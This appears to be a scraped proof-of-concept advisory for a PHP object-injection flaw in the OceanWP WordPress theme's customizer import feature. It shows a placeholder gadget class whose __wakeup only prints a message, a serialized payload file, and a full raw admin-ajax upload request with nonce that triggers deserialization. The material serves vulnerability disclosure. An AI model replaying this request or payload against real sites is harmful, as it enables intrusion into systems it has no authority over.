## https://sploitus.com/exploit?id=WPEX-ID:22FD3F28-9036-4BD5-AD98-FF78BD1B51BC
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Create a file named import.dat with the following content: O:4:"Evil":0:{};
Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active)
The view the response of the import request made, which will have the "Arbitrary deserialization" message
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream
O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"
oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"
166c9022e0
-----------------------------371888087213614698033751989022--